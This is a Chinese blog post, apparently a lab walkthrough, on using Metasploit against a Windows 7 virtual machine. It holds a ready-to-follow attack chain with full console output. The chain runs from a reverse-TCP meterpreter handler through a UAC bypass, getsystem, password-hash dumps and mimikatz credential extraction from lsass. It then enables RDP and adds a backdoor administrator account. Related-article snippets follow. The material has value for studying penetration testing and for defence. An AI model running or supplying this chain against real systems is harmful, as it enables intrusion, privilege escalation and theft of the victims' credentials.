MSF渗透利用木马

最新推荐文章于 2023-12-19 11:44:36 发布
最新推荐文章于 2023-12-19 11:44:36 发布
阅读量790 收藏 4
点赞数 2
文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnjnknkj/article/details/128474863
版权

MSF 利用木马渗透

1. 产生木马

2. 监听

#!bash/bin:

#进入msf

msfconsole

#使用msf handler

msf6 exploit(windows/local/bypassuac) > use exploit/multi/handler 
[*] Using configured payload windows/meterpreter/reverse_tcp

#放入载荷

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp

#设置攻击机IP

msf6 exploit(multi/handler) > set lhost 192.168.44.131
lhost => 192.168.44.131

#设置攻击机端口

msf6 exploit(multi/handler) > set lport 4444
lport => 4444

#监听

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.44.131:4444 
[*] Sending stage (175174 bytes) to 192.168.44.137
[*] Meterpreter session 9 opened (192.168.44.131:4444 -> 192.168.44.137:51323 ) at 2022-05-10 00:12:08 -0400

#获取到受害机 挂载在后台

meterpreter > background
[*] Backgrounding session 9...

https://blog.csdn.net/lvlheike/article/details/104643578

3. 提权

#绕过uac 使用bypassuas

msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] Using configured payload windows/meterpreter/reverse_tcp

#设置会话

msf6 exploit(windows/local/bypassuac) > set session 9
session => 9

#运行绕过

msf6 exploit(windows/local/bypassuac) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 192.168.44.131:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (175174 bytes) to 192.168.44.137
[*] Meterpreter session 10 opened (192.168.44.131:4444 -> 192.168.44.137:52055 ) at 2022-05-10 00:12:59 -0400

#绕过完成 获取当前用户名

meterpreter > getuid
Server username: root-PC\root

#提权

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

#获取当前用户名

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

#获取受害机的密码的哈希值 md5加密 第一种获取明文密码的方式

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7481dac7418852c914b1f37ca9f2b1c6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::

#导出受害机的密码哈希值 第一种获取明文密码的方式

meterpreter > run windows/gather/smart_hashdump

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against ROOT-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220510003633_default_192.168.44.137_windows.hashes_755360.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 7481dac7418852c914b1f37ca9f2b1c6...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[*]     No users with password hints on this system
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
[+]     003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::

#获取账户名明文密码 加载kiwi模块

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.

#kiwi不能在x64运行 必须要内存迁移

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; ==mimikatz x86 cannot access x64 process==


meterpreter > ps

Process List
============

 PID   PPID  Name                Arch  Session  User                          Path
 ---   ----  ----                ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System              x64   0
 244   4     smss.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 292   492   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 336   320   csrss.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 388   320   wininit.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 396   380   csrss.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 432   380   winlogon.exe        x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 460   396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 492   388   services.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 500   388   lsass.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 508   388   lsm.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 604   492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 680   492   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 764   492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 804   492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 856   492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1000  492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1104  804   dwm.exe             x64   1        root-PC\root                  C:\Windows\System32\dwm.exe
 1132  1092  explorer.exe        x64   1        root-PC\root                  C:\Windows\explorer.exe
 1172  492   spoolsv.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1192  492   taskhost.exe        x64   1        root-PC\root                  C:\Windows\System32\taskhost.exe
 1280  492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1428  492   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1456  396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 1496  1132  vm3dservice.exe     x64   1        root-PC\root                  C:\Windows\System32\vm3dservice.exe
 1504  1132  vmtoolsd.exe        x64   1        root-PC\root                  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1712  1528  jusched.exe         x86   1        root-PC\root                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
 1728  1528  Kernel32.exe        x86   1        root-PC\root                  C:\Windows\SysWOW64\Kernel32.exe
 1820  492   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1844  492   nessus-service.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Tenable\Nessus\nessus-service.exe
 1868  492   VGAuthService.exe   x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1876  1844  nessusd.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Tenable\Nessus\nessusd.exe
 1912  492   vmtoolsd.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2016  776   PDdXBksB.exe        x86   1        root-PC\root                  C:\Users\root\AppData\Local\Temp\PDdXBksB.exe
 2040  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2056  1132  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2060  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2068  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2128  604   WmiPrvSE.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2212  492   dllhost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 2360  492   msdtc.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2572  492   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2576  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2604  492   SearchIndexer.exe   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2744  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 2848  4300  cmd.exe             x86   1        root-PC\root                  C:\Windows\SysWOW64\cmd.exe
 3120  1132  shell.exe           x86   1        root-PC\root                  C:\Users\root\Desktop\shell.exe
 3136  4328  httpd.exe           x86   1        root-PC\root                  C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
 3452  396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 3740  396   conhost.exe         x64   1        root-PC\root                  C:\Windows\System32\conhost.exe
 3804  1132  firefox.exe         x86   1        root-PC\root                  C:\Users\root\Desktop\Firefox 49.0.1 渗透便携版 90SEC beta6\Firefox\firefox\firefox.exe
 4028  2056  chrome.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
 4328  5220  httpd.exe           x86   1        root-PC\root                  C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
 4436  5736  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 4688  5220  mysqld.exe          x86   1        root-PC\root                  C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
 4700  5328  java.exe            x64   1        root-PC\root                  C:\Program Files (x86)\java\bin\java.exe
 4756  2684  ggjfmL.exe          x86   1        root-PC\root                  C:\Users\root\AppData\Local\Temp\ggjfmL.exe
 4976  5800  TBSWebRenderer.exe  x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\3.7.9.426\TBSWebRenderer.exe
 5060  5800  TBSWebRenderer.exe  x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\3.7.9.426\TBSWebRenderer.exe
 5220  5180  phpStudy.exe        x86   1        root-PC\root                  C:\phpStudy\phpStudy.exe
 5328  5604  java.exe            x64   1        root-PC\root                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_1081258\java.exe
 5604  4304  cmd.exe             x64   1        root-PC\root                  C:\Windows\System32\cmd.exe
 5736  5668  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 5800  5736  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 6084  5800  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
 6092  5800  wemeetapp.exe       x86   1        root-PC\root                  C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe

#lsass.exe 的内存迁移

meterpreter > migrate 500
[*] Migrating from 4756 to 500...
[*] Migration completed successfully.

#第二种获取明文密码

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
root      root-PC  aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
ROOT-PC$  WORKGROUP  (null)
root      root-PC    (null)

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
root      root-PC  (null)

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
root      root-PC    (null)
root-pc$  WORKGROUP  (null)

#第三种明文获取办法

meterpreter > kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 85913 (00000000:00014f99)
Session           : Interactive from 1
User Name         : root
Domain            : root-PC
Logon Server      : ROOT-PC
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-21-2889893998-2302651844-2107436998-1000
        msv :
         [00000003] Primary
         * Username : root
         * Domain   : root-PC
         * LM       : aad3b435b51404eeaad3b435b51404ee
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        wdigest :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        kerberos :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 85874 (00000000:00014f72)
Session           : Interactive from 1
User Name         : root
Domain            : root-PC
Logon Server      : ROOT-PC
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-21-2889893998-2302651844-2107436998-1000
        msv :
         [00000003] Primary
         * Username : root
         * Domain   : root-PC
         * LM       : aad3b435b51404eeaad3b435b51404ee
         * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
         * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
        tspkg :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        wdigest :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        kerberos :
         * Username : root
         * Domain   : root-PC
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : ROOT-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:02
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : ROOT-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : root-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 46650 (00000000:0000b63a)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:01
SID               : 
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ROOT-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/5/9 17:17:01
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : ROOT-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : root-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

4. 远程连接

#开启远程登录

meterpreter > run post/windows/manage/enable_rdp 

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: extapi_adsi_domain_query, extapi_clipboard_get_data, extapi_clipboard_monitor_dump, extapi_clipboard_monitor_pause, extapi_clipboard_monitor_purge, extapi_clipboard_monitor_resume, extapi_clipboard_monitor_start, extapi_clipboard_monitor_stop, extapi_clipboard_set_data, extapi_ntds_parse, extapi_pageant_send_query, extapi_service_control, extapi_service_enum, extapi_service_query, extapi_window_enum, extapi_wmi_query, stdapi_sys_process_set_term_size
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220510004616_default_192.168.44.137_host.windows.cle_560551.txt

#进入受害机shell

meterpreter > shell
Process 1484 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

#转换编码 因为windows和linux 编码不同导致的编码

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

#查看当前的服务状态

C:\Windows\system32>net start
net start
These Windows services are started:

   Application Experience
   Application Information
   Background Intelligent Transfer Service
   Base Filtering Engine
   Certificate Propagation
   COM+ Event System
   COM+ System Application
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Resource Publication
   Group Policy Client
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   Multimedia Class Scheduler
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Offline Files
   Plug and Play
   Power
   Print Spooler
   Program Compatibility Assistant Service
   Remote Desktop Configuration
   Remote Desktop Services
   Remote Desktop Services UserMode Port Redirector
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Secondary Logon
   Security Accounts Manager
   Security Center
   Server
   Shell Hardware Detection
   SSDP Discovery
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Tenable Nessus
   Themes
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Audio Endpoint Builder
   Windows Defender
   Windows Event Log
   Windows Firewall
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Search
   Windows Update
   Workstation

The command completed successfully.

#将创建的用户添加到administrators的用户组 达到远程登录的原因

C:\Windows\system32>net localgroup administrators 001 /add           
net localgroup administrators 001 /add
The command completed successfully.

演示

rdesktop 192.168.44.137 -u 001
小菜鸟的修炼之路
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红日安全靶场3
weixin_48169878的博客
07-13 4152
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
msf 渗透测试
06-05
msf渗透
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 2817
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
墨痕诉清风的博客
03-27 5788
我在实验室环境中在服务器2019上使用了最新的mimikatz 2.2版本(12/25)。我收到以下错误“error kuhl_m_sekurlsa_acquireLSA;关键进口” 我尝试了早期版本2.1.1 #17763,并运行sekurlsa::logonpasswords就可以了。使用mimikatz的2.2.1版本即可避免此告警。原作者第一发现报错git描述。
PPL攻击详解
hongduilanjun的博客
11-01 3739
PPL表示“受保护的流程”,但在此之前,只有“受保护的流程”。Windows Vista / Server 2008引入了受保护进程的概念,其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并符合DRM(数字版权管理)要求。Microsoft开发了此机制,以便您的媒体播放器可以读取例如蓝光,同时防止您复制其内容。当时的要求是映像文件(即可执行文件)必须使用特殊的Windows Media证书进行数字签名(如Windows Internals的“受保护的过程”部分所述)。
Mimikatz ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
最新发布
BlackNight168的博客
12-19 492
关键进口” 我尝试了早期版本2.1.1 #17763,并运行sekurlsa::logonpasswords就可以了。原文链接:https://blog.csdn.net/u012206617/article/details/129790597。版权声明:本文为CSDN博主「墨痕诉清风」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。从报错信息看,有一个key导致失败了,查了一下github原地址 issue 找到了答案。1. 确定不是权限的问题,已是最高权限。
kali 渗透msf
11-14
kali渗透测试利器
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf内网渗透
10-29
msf内网渗透
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
MySQL数据库渗透及漏洞利用总结
02-20
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
移动端渗透测试框架MSF
09-24
移动端渗透测试框架Mobile-Security-Framework-MobSF-master,可以搭建完成后进行移动端渗透测试
MSF安卓手机渗透.md
12-07
MSF安卓手机渗透.md
msf 使用mimikatz获取明文密码过程中报错Retrieving wdigest credentials
sweelg的博客
06-02 1387
当我们用meterpreter提权成功之后
MSF渗透永恒之蓝
nnjnknkj的博客
12-28 906
MSF利用 永恒之蓝入侵
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权)
weixin_51803729的博客
02-12 5193
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权)
我的MSF木马制作与渗透笔记
yuan_boss的博客
06-06 467
本文旨在分享快速实现简单木马,并且进行后续渗透与后续渗透的思考总结
利用msf渗透centos7
05-10
Metasploit Framework是一款常用的渗透测试工具,可以用于检测和利用系统中的漏洞。下面是在CentOS 7上使用Metasploit Framework进行渗透的基本步骤: 1. 安装Metasploit Framework CentOS 7 可以使用以下命令安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值